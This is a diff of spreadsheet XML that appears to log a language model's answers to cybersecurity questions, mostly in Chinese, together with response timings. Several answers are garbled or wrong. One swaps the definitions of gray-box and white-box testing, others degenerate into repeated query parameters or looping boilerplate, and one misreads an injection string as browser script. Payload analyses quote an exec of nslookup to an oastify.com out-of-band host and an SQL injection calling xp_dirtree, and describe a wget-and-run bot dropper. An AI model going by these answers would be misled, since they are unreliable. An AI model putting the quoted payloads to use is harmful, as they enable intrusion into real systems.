+6. Man-in-the-middle attacks: These are attacks where a hacker intercepts communication between a target and a third party, altering the communication in some way. Man-in-the-middle attacks can be used to steal sensitive information, inject malware, or disrupt communication.
+Intermediate attacks can be launched from anywhere in the world, and can be difficult to detect and defend against. They often require a significant amount of resources and expertise to launch, and can have significant impact on the target's operations and reputation.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D47" t="n">
-        <v>5.024422883987427</v>
+        <v>12.84392380714417</v>
       </c>
     </row>
     <row r="48">
@@ -1478,13 +1726,14 @@
       <c r="C48" t="inlineStr">
         <is>
           <t>？
-灰盒测试（Gray Box Testing）和白盒测试（White Box Testing）是两种不同的测试方法。
-灰盒测试是指在测试时，了解测试软件的实现细节，但不知道软件的内部实现细节。这种测试方法中，测试人员可以通过观察、测试输入和 outputs 来评估软件的功能。灰盒测试适用于软件中的复杂功能和异常情况 testing。
-白盒测试是指在测试时，不知道软件的实现细节，只知道软件的外层接口和inputs和outputs。这种测试方法中，测试人员只能通过外层接口和inputs和outputs来</t>
+灰盒测试和白盒测试是指在软件开发阶段进行的测试方法。
+灰盒测试（Gray Box Testing）是指在软件代码的概念和模型中进行测试，但不详细了解代码实现细节。通过观察代码行为和输入输出行为，检查代码是否按照预期工作。
+白盒测试（Black Box Testing）是指不考虑软件代码的实现细节，直接对用户 Input 和输出行为进行测试。通过几种不同的 input 和输出值，检查软件是否能够正确地处理它们。
+两种方法都是软件测试的基本方法之一，可以单独使用或结合使用，以满足不同的测试需求。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D48" t="n">
-        <v>5.072787284851074</v>
+        <v>6.890358448028564</v>
       </c>
     </row>
     <row r="49">
@@ -1499,14 +1748,29 @@
       <c r="C49" t="inlineStr">
         <is>
           <t>？
-WiFi密码的破解，主要是因为WiFi信号的弱点和攻击者的技术。以下是一些常见的WiFi破解方法：
-1. 使用Brute ForceAttack：通过使用计算机来试图猜测WiFi密码，这种方法需要很长的时间和计算机的快速性。
-2. 使用WPS攻击：WiFi Protected Setup（WPS）是WiFi网络的安全增强功能，但它的缺陷使得WiFi网络易受到攻击。攻击者可以使用WPS攻击方法获得WiFi网络的访问权限。
-3. 使用SidejackingAttack：SidejackingAttack是一种攻击</t>
+作者：吴晨
+WiFi密码的破解是一个常见的问题，它可能会导致您的个人隐私和网络安全受到威胁。在这篇文章中，我们将详细介绍Why WiFi密码会被破解，以及如何加强WiFi安全。
+Why WiFi密码会被破解？
+WiFi密码的破解可能是由于以下原因：
+1. 密码的简单性：相比于其他类型的密码，WiFi密码的长度和复杂性通常较低。这可能使其更容易被破解。
+2. 无需输入密码：在许多情况下，您可能不需要输入WiFi密码，例如在您的设备自动连接到WiFi网络时。这可能使攻击者更容易破解您的密码。
+3. 泄露的密码：如果您的WiFi密码已经泄露，那么攻击者可能已经有了您的密码。
+4. 病毒和黑客：病毒和黑客可能会在您的设备上安装病毒或黑客软件，以便窃取您的个人隐私和网络安全。
+如何加强WiFi安全？
+以下是一些可能有助于加强WiFi安全的方法：
+1. 使用复杂的密码：使用复杂的密码可以增加您的WiFi密码的安全性。建议使用至少8位的字符串，并避免使用容易被猜测的密码，例如您的姓名、生日或特定的数字。
+2. 需要输入密码：通过要求您输入WiFi密码每次连接时，可以增加您的WiFi安全性。这可能防止攻击者窃取您的密码。
+3. 使用WPA2 protocol：WPA2是现代WiFi安全标准，它使用了加密和非对称加密技术来保护您的网络安全。建议使用WPA2 protocol来加强您的WiFi安全。
+4. 禁用SSID显示：禁用SSID显示可以减少攻击者窃取您的WiFi密码的可能性。
+5. 使用 firewall：使用 firewall 可以增加您的网络安全性，防止攻击者窃取您的网络数据。
+6. 监控网络活动：监控网络活动可以帮助您发现和防止网络安全威胁。
+7. 升级设备：升级您的设备可以增加您的WiFi安全性。例如，升级到最新的操作系统和安全软件可以增加您的安全性。
+结论
+WiFi密码的破解是一个常见的问题，它</t>
         </is>
       </c>
       <c r="D49" t="n">
-        <v>5.050607204437256</v>
+        <v>25.08624315261841</v>
       </c>
     </row>
     <row r="50">
@@ -1521,13 +1785,24 @@
       <c r="C50" t="inlineStr">
         <is>
           <t>它？
-DDoS（Distributed Denial of Service）攻击是一种网络攻击方式，在该攻击中，攻击者通过多个来源向受害者的服务器或网站发送大量包，以压力服务器或网站，使其不能正常运行。这种攻击通常是为了破坏受害者的网站或服务的行为，或者为了通过恐吓或攻击受害者来达到某些目的。
-如何避免DDoS攻击？以下是一些常见的避免方法：
-1. 增加服务器和网站的吞吐量：可以通过添加更多的服务器和网站来增加系统的吞吐量，</t>
+DDoS攻击是一种网络攻击，它通过多个来源发送大量请求，以压力攻击被攻击者的网络或服务器。这种攻击通常来自一个或多个虚幕网络，虚幕网络通常是由受到控制的黑客或恶意软件控制的系统。
+DDoS攻击可以从多个方面来攻击，例如：
+1. 网络压力攻击：通过尝试连接多个服务器或网络，以增加它们的吞吐量，以使它们不能承受更多的请求。
+2. 端到端攻击：通过在受到攻击的网络之间创建一个偽裝的端到端连接，以增加它们的吞吐量。
+3. 应用层攻击：通过使用特殊的应用层攻击方式，例如恶意请求或压力请求，以攻击受到攻击的应用程序。
+避免DDoS攻击的方法有以下几点：
+1. 增加网络的吞吐量和准备性：通过增加网络的吞吐量和准备性，以承受更多的请求。
+2. 使用防火墙和网络安全产品：使用防火墙和网络安全产品，例如防火墙、防恶意软件、防端到端攻击等，以防止攻击。
+3. 增加网络的灵活性：通过增加网络的灵活性，以适应不同的吞吐量和压力。
+4. 增加网络的稳定性：通过增加网络的稳定性，以避免因为攻击而导致的网络崩溃。
+5. 寻求专业的帮助：如果您的网络受到了DDoS攻击，可以寻求专业的帮助，例如咨询公司、安全提供商等。
+6. 实施DDoS防御策略：实施DDoS防御策略，例如防止攻击者注册IP地址、屏蔽攻击者的请求、筛选受到攻击的请求等。
+7. 实施网络监控和风险评估：实施网络监控和风险评估，以检测和反制DDoS攻击。
+总之，避免DDoS攻击需要强大的网络设备和高级的网络安全技术，同时也需要增加网络的灵活性和稳定性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D50" t="n">
-        <v>5.067591190338135</v>
+        <v>24.63602948188782</v>
       </c>
     </row>
     <row r="51">
@@ -1542,13 +1817,20 @@
       <c r="C51" t="inlineStr">
         <is>
           <t>？
-SQL注入是一种常见的web应用程序攻击方式，可以使用SQL语句来访问或修改数据。检测SQL注入攻击是非常重要的，以确保数据安全和网站的可靠性。下面是一些常用的方法来检测SQL注入攻击：
-1. 使用SQL注入测试工具：有许多开源的SQL注入测试工具可以帮助您检测SQL注入攻击。例如，SQLMap、Burp Suite、ZAP等。这些工具可以automatically scan your web application for vulnerabilities and identify potential SQL injection attacks.
-2. 使用黑客测试：黑客测试是一种常用的方法来检测SQL注入攻击。黑客测试可以模拟攻击者</t>
+SQL注入是一种常见的web应用安全漏洞，可以使攻击者获取或修改数据。以下是一些方法来检测SQL注入攻击：
+1. 使用SQL Injection Scanner：SQL Injection Scanner是一个免费的工具，可以帮助您检测Web应用程序中的SQL注入攻击。您可以在您的Web应用程序上运行该工具，以detect potential SQL injection vulnerabilities。
+2. 查看URL中的变量：检查URL中的变量，是否包含可能的SQL注入攻击。例如，如果您的Web应用程序接受URL中的用户名和密码，那么这些变量可能会被攻击者利用来访问您的数据。
+3. 查看请求体中的变量：检查请求体中的变量，是否包含可能的SQL注入攻击。例如，如果您的Web应用程序接受请求体中的数据，那么这些变量可能会被攻击者利用来访问您的数据。
+4. 使用漏洞扫描工具：您可以使用漏洞扫描工具，如Nessus或OpenVAS，来检测您的Web应用程序中的SQL注入攻击。这些工具可以扫描您的Web应用程序，并检测可能的漏洞。
+5. 使用 manual SQL injection：您可以手动输入SQL注入攻击，以检测您的Web应用程序中的漏洞。例如，您可以输入一个特殊的请求，以访问您的数据。如果您的Web应用程序可以处理这种请求，那么您的应用程序可能存在SQL注入攻击。
+6. 使用检查SQL语句：您可以使用SQL语句检查工具，如 Burp Suite或ZAP，来检测您的Web应用程序中的SQL注入攻击。这些工具可以检查您的Web应用程序，并检测可能的漏洞。
+7. 使用检查SQL语句：您可以使用检查SQL语句工具，如 OWASP ZAP，来检测您的Web应用程序中的SQL注入攻击。这些工具可以检查您的Web应用程序，并检测可能的漏洞。
+8. 使用漏洞扫描工具：您可以使用漏洞扫描工具，如Nessus或OpenVAS，来检测您的Web应用程序中的SQL注入攻击。这些工具可以扫描您的Web应用程序，并检测可能的漏洞。
+总之，您需要使用多种方法来检测SQL注入攻击。这些方法可以帮助您检测您的Web应用程序中的漏洞，并帮助您保护您的数据安全。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D51" t="n">
-        <v>5.043830394744873</v>
+        <v>24.30550742149353</v>
       </c>
     </row>
     <row r="52">
@@ -1562,15 +1844,19 @@
       </c>
       <c r="C52" t="inlineStr">
         <is>
-          <t>是否已经执行了命令？
-如果你在WebShell中运行了一个命令，您可以使用`echo`命令来查看它是否已经执行了。如果您在WebShell中运行了一个命令，您可以使用`print`命令来查看它的输出。
-如果您想知道WebShell是否已经执行了命令，可以使用以下方法：
-1. 使用`!echo`命令：在WebShell中输入`!echo $?`，这将返回命令执行的结果。如果命令执行成功，则返回0，如果命令执行失败，则返回1。
-2. 使用`!print`命令：在WebShell中输入`!print $?`，这将显示命令的输出。如果命令执行成功，则将显示输出，</t>
+          <t>是否已经执行了？
+如果您的WebShell已经执行了，您可以通过以下方式来检测它：
+1. 检查服务器日志：WebShell可能会创建一个备份或者日志文件，您可以通过检查服务器日志来检测它的执行结果。
+2. 使用Network Traffic Analyzer：您可以使用Network Traffic Analyzer来监控网络流量，检查是否有任何不明确的网络流量，这可能是WebShell的执行结果。
+3. 检查服务器的性能：如果WebShell执行了，服务器的性能可能会受到影响，您可以通过检查服务器的性能指标来检测它的执行结果。
+4. 使用Antivirus软件：您可以使用Antivirus软件来检测WebShell是否已经执行了，它可能会检测到WebShell的执行结果。
+5. 检查服务器的文件系统：如果WebShell执行了，它可能会 modify 服务器的文件系统，您可以通过检查服务器的文件系统来检测它的执行结果。
+6. 使用WebShell检测工具：您可以使用WebShell检测工具来检测WebShell是否已经执行了，这些工具可能会检测到WebShell的执行结果。
+请注意，检测WebShell是否已经执行了可能需要一些时间和资源，特别是如果WebShell是一个复杂的脚本。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D52" t="n">
-        <v>5.17884635925293</v>
+        <v>13.30484080314636</v>
       </c>
     </row>
     <row r="53">
@@ -1585,14 +1871,19 @@
       <c r="C53" t="inlineStr">
         <is>
           <t>？
-网络安全归因分析是一种分析网络中安全事件的方法，它可以帮助组织了解网络中安全事件的发生机理，并通过分析和优化网络的设置和 configurations 来降低安全风险。
-以下是一些步骤可以用于做网络安全归因分析：
-1. 定义分析对象和范围：确定要进行分析的网络范围和对象，以及要包括在分析中的哪些网络元素。
-2. 收集和整理数据：收集网络中的安全事件数据，包括各种网络攻击、</t>
+网络安全归因分析（Network Security Anomaly Detection）是一种可以帮助企业检测和识别网络中的安全异常行为的技术。以下是一些有用的指导，可以帮助您做网络安全归因分析：
+1. 了解您的网络环境：了解您的网络环境是第一步。了解您的网络结构，包括网络设备、网络服务器、客户端和网络应用程序。了解这些元素的特点和攻击风险，以便更好地针对异常行为。
+2. 使用数据分析：通过对网络数据进行分析，可以检测到异常行为。您可以使用网络监控工具来收集网络数据，然后使用数据分析工具来检测异常行为。
+3. 设置严格的策略：在检测异常行为时，您可以设置严格的策略来阻止异常行为。例如，您可以使用防火墙或安全规则来阻止不明确的网络流量。
+4. 利用人工智能（AI）和机器学习（ML）：人工智能和机器学习技术可以帮助您自动检测和识别异常行为。您可以使用这些技术来分析网络数据，并根据分析结果自动采取应急措施。
+5. 监控和评估：监控和评估网络安全归因分析是非常重要的。您需要监控网络安全归因分析的实时性和精度，并评估其效果。
+6. 兼容性和可扩展性：您需要选择一种兼容性和可扩展性异常行为检测工具，以便它能够适应您的网络环境和需求。
+7. 维护和升级：网络安全归因分析是一个不断发展的领域，您需要维护和升级您的工具，以便能够满足您的网络安全需求。
+总之，网络安全归因分析是一种重要的网络安全技术，它可以帮助您检测和识别网络中的安全异常行为。但是，您需要选择一种适合您的网络环境和需求的工具，并不断监控和评估其效果。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D53" t="n">
-        <v>5.146872043609619</v>
+        <v>23.98071885108948</v>
       </c>
     </row>
     <row r="54">
@@ -1607,15 +1898,33 @@
       <c r="C54" t="inlineStr">
         <is>
           <t>Analysis
-网络攻击溯源Analysis是一种重要的网络安全工具，它可以帮助Network Administrator track down and identify the source of a network attack, thereby improving the security of the network. In this article, we will explore how to perform network attack tracing and analysis.
-What is Network Attack Tracing and Analysis?
-Network attack tracing and analysis is the process of identifying the source of a network attack by analyzing network traffic data. This involves collecting and analyzing network logs, packets, and other data to determine the origin of the attack and the tactics used by the attacker. The goal of network attack tracing and analysis is to identify the weaknesses in the network that were exploited by the attacker, so that they can be fixed to prevent future attacks.
-Why is Network Attack Tracing and Analysis Important?
-Network attack tracing and analysis is important because it helps to improve the security of the network by identifying the source of the attack and the tactics used by the attacker. By identifying the weaknesses in</t>
+Network attack tracing is the process of identifying the source of a network attack by analyzing the packets and network traffic generated by the attack. This process can help network administrators determine the origin of the attack, identify the type of attack, and take appropriate measures to mitigate the attack. In this article, we will explore the steps involved in network attack tracing and how it can help organizations improve their network security.
+Steps involved in network attack tracing
+1. Collecting network traffic data: The first step in network attack tracing is to collect network traffic data. This can be done using network monitoring tools such as Wireshark, Tcpdump, or other packet sniffing tools. The tools capture and save network packets for analysis.
+2. Analyzing network packets: Once the network traffic data is collected, the next step is to analyze the packets to identify the source of the attack. This involves examining the source and destination IP addresses, port numbers, and other packet metadata.
+3. Identifying attack patterns: Once the source of the attack is identified, the next step is to identify the type of attack. This involves analyzing the packet contents and identifying patterns that are indicative of different types of attacks, such as SQL injection, cross-site scripting, or denial-of-service attacks.
+4. Correlating data: To gain a deeper understanding of the attack, it is essential to correlate network traffic data with other security-related data, such as log files, system logs, and security event logs. This helps identify the timeline of the attack and the resources affected.
+5. Reconstructing the attack: By analyzing the network packets and other security-related data, security analysts can reconstruct the attack and understand the tactics, techniques, and procedures (TTPs) used by the attacker.
+6. Identifying the attacker: Based on the analysis of the attack, security analysts can identify the attacker's IP address, geolocation, and other identifying characteristics.
+7. Informing incident response: Once the source and type of attack are identified, security analysts can inform the incident response team and help them take appropriate measures to mitigate the attack.
+Benefits of network attack tracing
+Network attack tracing offers several benefits to organizations, including:
+1. Improved incident response: By identifying the source and type of attack, organizations can quickly respond to incidents and minimize the impact on their network and systems.
+2. Enhanced security posture: Network attack tracing helps organizations identify vulnerabilities and weaknesses in their network and systems, allowing them to take appropriate measures to improve their security posture.
+3. Better threat intelligence: Network attack tracing provides organizations with valuable threat intelligence that can help them anticipate and prepare for future attacks.
+4. Compliance: Network attack tracing can help organizations meet compliance requirements by providing evidence of their security measures and incident response processes.
+Challenges of network attack tracing
+Network attack tracing can be challenging due to various reasons, including:
+1. Complexity of network traffic: Network traffic can be complex and voluminous, making it difficult to identify and analyze attacks.
+2. Limited visibility: Network traffic may be encrypted or masked, making it difficult to identify the source of the attack.
+3. Time-sensitive nature of attacks: Attacks can be time-sensitive, and organizations may have limited time to respond to them.
+4. Limited resources: Organizations may have limited resources, including personnel and budget, which can make it challenging to invest in network attack tracing tools and processes.
+Conclusion
+Network attack tracing is a critical process for organizations to identify the source and type of attacks on their network and systems. By collecting network traffic data, analyzing packets, identifying attack patterns, correlating data, reconstructing the attack, and identifying the attacker, organizations can gain valuable insights into the tactics, techniques, and procedures used by attackers. Network attack tracing offers several benefits, including improved incident response, enhanced security posture, better threat intelligence, and compliance. However, network attack tracing can be challenging due to the complexity of network traffic, limited visibility, time-sensitive nature of attacks, and limited resources. By understanding these challenges and investing in the right tools and processes, organizations can improve their network security and protect their assets from cyber threats.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D54" t="n">
-        <v>5.143506765365601</v>
+        <v>23.5728280544281</v>
       </c>
     </row>
     <row r="55">
@@ -1630,11 +1939,11 @@
       </c>
       <c r="C55" t="inlineStr">
         <is>
-          <t>9&amp;amp;login_time=1518039742000&amp;amp;login_ip=192.168.1.100&amp;amp;login_os=Windows_7_Professional_64_Bit_English&amp;amp;login_browser=Google_Chrome_64_bit&amp;amp;platform=PC&amp;amp;device=0&amp;amp;language=en&amp;amp;country=US&amp;amp;region=CA&amp;amp;city=Vancouver&amp;amp;zip=V6B1W5&amp;amp;st=&amp;amp;ctry=US&amp;amp;province=BC&amp;amp;city=Vancouver&amp;amp;zip=V6B1W5&amp;amp;authType=1&amp;amp;authMethod=2&amp;amp;login_type=1&amp;amp;mem_status=0&amp;amp;mem_level=0&amp;amp;mem_date=2018-02-26&amp;amp;mem_time=10:40:00&amp;amp;rememberMe=true&amp;amp;checksum=826184344&amp;</t>
+          <t>90&amp;amp;language=zh_CN&amp;amp;appVer=12.0.0.0&amp;amp;osVer=4.1.2&amp;amp;deviceVer=3.4.0.0&amp;amp;clientVer=1.0.0.0&amp;amp;productName=Android&amp;amp;productVer=4.1.2&amp;amp;javaVer=1.6.0_31&amp;amp;osArch=arm&amp;amp;cpuArch=arm&amp;amp;screenResolution=480x800&amp;amp;memory=128&amp;amp;flashVer=11.0.0.0&amp;amp;geolocation=CN&amp;amp;imei=1518521447425&amp;amp;device_id=1833368037384711551&amp;amp;platform=Android&amp;amp;app_id=com.example.myapp&amp;amp;app_name=My App&amp;amp;app_ver=1.0.0&amp;amp;from=wap&amp;amp;to=wap&amp;amp;ua=Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.1) Gecko/20071127 Firefox/2.0.0.1&amp;amp;referer=http://m.example.com/ &amp;amp;referrer=http://m.example.com/&amp;amp;referer_url=http://m.example.com/ &amp;amp;referer_url_hash=30022030031986&amp;amp;referer_url_query=typeCode=E0001&amp;amp;referer_url_query_hash=30022030031986&amp;amp;referer_url_query_params=uKeySn%3D30022030031986&amp;amp;referer_url_query_params_hash=30022030031986&amp;amp;referer_url_query_params_keys=uKeySn&amp;amp;referer_url_query_params_keys_hash=30022030031986&amp;amp;referer_url_query_params_values=30022030031986&amp;amp;referer_url_query_params_values_hash=30022030031986&amp;amp;referer_url_query_params_values_keys=uKeySn&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_values=30022030031986&amp;amp;referer_url_query_params_values_values_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986</t>
         </is>
       </c>
       <c r="D55" t="n">
-        <v>5.365535020828247</v>
+        <v>23.96703433990479</v>
       </c>
     </row>
     <row r="56">
@@ -1649,11 +1958,28 @@
       </c>
       <c r="C56" t="inlineStr">
         <is>
-          <t>%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%</t>
+          <t>%20YOUR%20SQL%20INJECTION%20HERE
+您的网站可能遭受到网络攻击，请尽快办理相关的漏洞处理。
+这是一个SQL注入漏洞，可能会导致您的网站遭受到敏感数据的泄露。请立即进行修复，以防止这种攻击。
+如果您不知道如何处理这种漏洞，可以咨询专业的安全人员或企业隐私咨询公司，以便更好地了解和管理您的网站安全。
+请遵守下面的指南来处理这种漏洞：
+1. 尽快地修复漏洞，以避免敏感数据的泄露。
+2. 升级您的网站和程序到最新的版本，以减少攻击的风险。
+3. 实施安全措施，以防止类似的攻击再次发生。
+4. 定期执行网站安全检测和筛选，以发现和修复其他漏洞。
+如果您需要帮助，可以向我们的安全团队转达，我们会尽力协助您解决问题。
+我们的安全团队将不断监测和筛选您的网站，以确保您的网站安全。
+我们的团队会不断努力，以确保您的网站安全。
+这是一个网络攻击，请尽快处理。
+您的网站安全很重要，我们会尽力协助您保护它。
+请遵守我们的指南，以确保您的网站安全。
+如果您需要帮助，请转达我们的安全团队。
+我们会尽力协助您解决问题。
+您好！&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D56" t="n">
-        <v>5.172029495239258</v>
+        <v>15.28084921836853</v>
       </c>
     </row>
     <row r="57">
@@ -1668,19 +1994,14 @@
       </c>
       <c r="C57" t="inlineStr">
         <is>
-          <t>\u0027&amp;username=test\u0027&amp;password=test\u0027&amp;referer=www.baidu.com
-This is a encoded payload, it's not a normal query string. The payload contains a mixture of ASCII characters, Unicode characters, and hexadecimal digits. The Unicode characters are likely used to encode the attacker's payload, making it more difficult to detect.
-To analyze this payload, you can use a hexadecimal editor to decode the payload. Here's how you can do it:
-1. Open a hexadecimal editor, such as Hex Fiend or Hex Editor.
-2. Paste the payload into the editor.
-3. Select the entire payload and click on the "Decode" or "Hex" button in the editor.
-4. The payload will be decoded and displayed in plain text.
-After decoding the payload, you can analyze it to determine if it's a legitimate payload or a potential attack. If you find any suspicious or unusual code, it's likely a malicious payload.
-Here are some things to look for when</t>
+          <t>\u0027&amp;Payload=&lt;div&gt;This%20is%20a%20payload%20generated%20for%20testing%20purposes.&lt;/div&gt;
+Please help me identify the type of attack this is, and provide recommendations on how to prevent or mitigate it.
+Note: The payload contains special characters like `\u0027` and `\u0020`, which are used to evade detection by some security products.
+Thank you!&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D57" t="n">
-        <v>5.169776201248169</v>
+        <v>2.642839193344116</v>
       </c>
     </row>
     <row r="58">
@@ -1695,16 +2016,18 @@
       </c>
       <c r="C58" t="inlineStr">
         <is>
-          <t>payload
-The above is a payload for an exploit. It is a MIPS assembly code that targets a vulnerable system with a buffer overflow attack. The payload is designed to overwrite the return address on the stack with the address of a shell script located at `/tmp/fbot.mipsel`, which will be executed when the program returns from the overflowed function.
-To determine if this is a legitimate payload or an attack, you can analyze the following aspects:
-1. Code structure: The code is written in MIPS assembly language, which is a low-level programming language used to program microprocessors. The structure of the code, including the use of instructions, registers, and memory addresses, can indicate whether it is a legitimate payload or an attack.
-2. Function call patterns: The payload includes function calls to `wget`, `chmod`, and `./fbot.mipsel`. These functions are commonly used in exploit code, but they may also be legitimate system utilities on a compromised system. Analyzing the function call patterns can help identify the intent of the code.
-3. Return address manipulation: The payload overwrites the return address on the stack</t>
+          <t>This is a Payload in a malware file, specifically a Trojan horse. The payload is designed to delete the /tmp directory, delete the file mpsl, and execute a script called fbot.mipsel. The script is located at the specified URL and is downloaded to the system using the wget command. Once downloaded, the script is executed using the chmod command to give it execute permissions, and then it is executed using the ./fbot.mipsel command.
+The payload is designed to carry out a specific set of actions on the compromised system, including deleting a directory and a file, and executing a script. The script is located on a remote server and is downloaded to the system using the wget command. This indicates that the payload is likely part of a larger attack campaign, and the remote server may be hosting other malicious files or scripts that could be executed on the compromised system.
+To determine whether this is a genuine attack or not, you can analyze the payload in more detail to determine its purpose and potential impact on the system. Some things you might consider include:
+1. What is the purpose of the payload? Is it designed to steal sensitive data, install additional malware, or carry out some other type of attack?
+2. What is the remote server hosting the script? Is it a legitimate server or a malicious one?
+3. What are the potential impacts of executing the payload on the system? Could it lead to data theft, data destruction, or other types of damage?
+4. How did the payload make it onto the system? Was it delivered through a phishing email, a vulnerability in a software application, or some other means?
+By answering these questions and conducting a thorough analysis of the payload, you can determine whether it is a genuine attack or not.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D58" t="n">
-        <v>5.184736967086792</v>
+        <v>8.898081541061401</v>
       </c>
     </row>
     <row r="59">
@@ -1719,17 +2042,21 @@
       </c>
       <c r="C59" t="inlineStr">
         <is>
-          <t>300000000))
-```
-这是一个受到网络攻击的示例。在这个示例中，我们可以看到一个很长的URL，其中包含了一些不同的参数和值。这些参数和值可以用于在服务器端执行不同的操作，例如：
-* `var='2sk' value='1rj9wmatwz'`：设置一个变量 `var` 的值为 `1rj9wmatwz`。
-* `var='4um' value='3tlbyocvy1'`：设置另一个变量 `var` 的值为 `3tlbyocvy1`。
-* `echo var='2sk'`：在服务器端输出 `var` 的值，即 `1rj9wmatwz`。
-* `echo var='4um'`：在服务器端输出 `var` 的值</t>
+          <t>这是一个网络攻击，因为它在用户的浏览器中执行了命令。
+这是一种常见的网络攻击，叫做「脚本攻击」。在这种攻击中，攻击者在受害者的浏览器中执行一系列的命令，以便获取受害者的个人隐私和敏感数据。
+在这个例子中，攻击者在受害者的浏览器中执行了以下命令：
+* `--&gt;` 这个符号表示执行命令。
+* `--&gt;` 这个符号表示设置变量 `var` 的值。
+* `value='1rj9wmatwz'` 这个命令将变量 `var` 的值设置为 `1rj9wmatwz`。
+* `value='3tlbyocvy1'` 这个命令将变量 `var` 的值设置为 `3tlbyocvy1`。
+* `echo var='2sk'` 这个命令将变量 `var` 的值打印到屏幕上。
+* `echo var='4um'` 这个命令将变量 `var` 的值打印到屏幕上。
+* `exec cmd='nslookup -q=cname oe6wj9xgjmgiqgokdcg495oogfmba56tyrml9bx0.oastify.com'` 这个命令执行了命令 `nslookup`，并将其的输出打印到屏幕上。
+这些命令可能会执行不同的操作，例如提取受害者的个人隐私和敏感数据，或者恶意地带来黑客技术攻击。因此，您应该避免访问这种类型的网站，以避免遭受网络攻击。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D59" t="n">
-        <v>5.224760055541992</v>
+        <v>13.61357569694519</v>
       </c>
     </row>
     <row r="60">
@@ -1743,12 +2070,11 @@
         </is>
       </c>
       <c r="C60">
-        <f>7 --&amp;status=200 --&amp;query=Select * from departments where deptid=@deptid; select @deptid=id;--&amp;deptid=11320000696785044; exec master.dbo.xp_dirtree @q; --&amp;iddept_ql_inf=11320000696785044Q2322007019000&amp;ql_kind=7 --&amp;status=200 --&amp;query=Select * from departments where deptid=@deptid; select @deptid=id;--&amp;deptid=11320000696785044; exec master.dbo.xp_dirtree @q;'
-This is a SQL injection attack. The attacker is using a UNION operator to combine the results of two different queries, which would otherwise be disallowed by the SQL server. The first query retrieves the ID of a department, and the second query retrieves all the rows from the `departments`</f>
+        <f>1&amp;ql_dept_id=11320000696785044&amp;sub_id=0&amp;sql_text=SELECT+%28%5B%28SELECT+%28%23department_id+%28%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+</f>
         <v/>
       </c>
       <c r="D60" t="n">
-        <v>5.222592353820801</v>
+        <v>23.67960166931152</v>
       </c>
     </row>
     <row r="61">
@@ -1763,11 +2089,24 @@
       </c>
       <c r="C61" t="inlineStr">
         <is>
-          <t>&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#655</t>
